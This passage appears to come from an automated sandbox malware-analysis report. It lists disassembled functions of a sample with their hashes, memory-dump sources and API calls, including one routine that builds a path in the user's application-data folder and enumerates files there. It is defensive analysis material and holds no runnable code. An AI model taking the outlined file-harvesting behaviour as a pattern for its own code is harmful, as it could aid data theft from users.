                          • Opcode ID: 3c5603587793b1f6e4e74743477838b0e5f96ac2e22e902924320a8052bfad4e
                          • Instruction ID: 9c16add79dfbdad225b4b9bf20a123c79383cf9e839c4d8fb88bc5852d7ac7cb
                          • Opcode Fuzzy Hash: 3c5603587793b1f6e4e74743477838b0e5f96ac2e22e902924320a8052bfad4e
                          • Instruction Fuzzy Hash: 40F06D36944A189BF663FBA89802F9F33A8AF00728F100149F605F61D3DB245D808B97
                          Function 000A04D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Catch
                          • String ID: MOC$RCC
                          • API String ID: 78271584-2084237596
                          • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                          • Instruction ID: fc620f7a72fd225c482e0dda35c22e1db9f914fe2170530d20c93caa30239b00
                          • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                          • Instruction Fuzzy Hash: 4841487190020DAFDF16DFA8DC81AEEBBB5BF49304F188199F904AA211D3359A50DF51
                          Function 00035190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00038F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00038F9B
                          • lstrcat.KERNEL32(?,00000000), ref: 000351CA
                          • lstrcat.KERNEL32(?,00041058), ref: 000351E7
                          • lstrcat.KERNEL32(?,00FD9118), ref: 000351FB
                          • lstrcat.KERNEL32(?,0004105C), ref: 0003520D
                            • Part of subcall function 00034B60: wsprintfA.USER32 ref: 00034B7C
                            • Part of subcall function 00034B60: FindFirstFileA.KERNEL32(?,?), ref: 00034B93
                            • Part of subcall function 00034B60: StrCmpCA.SHLWAPI(?,00040FC4), ref: 00034BC1
                            • Part of subcall function 00034B60: StrCmpCA.SHLWAPI(?,00040FC8), ref: 00034BD7
                            • Part of subcall function 00034B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00034DCD
                            • Part of subcall function 00034B60: FindClose.KERNEL32(000000FF), ref: 00034DE2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: bef2b5600344404abad6b0d945ff548e90ec848a92dbdbb3e1413964860ad9b5
                          • Instruction ID: b4655d6cd158e40c2a918600aed8ff33a6ba6fe46cac0fe2af7bae0c1905d87d
                          • Opcode Fuzzy Hash: bef2b5600344404abad6b0d945ff548e90ec848a92dbdbb3e1413964860ad9b5
                          • Instruction Fuzzy Hash: 6821FCB6904208ABDB14FB70FC4AEFD733D9B54340F0046A4B65656192EF749AC8CB91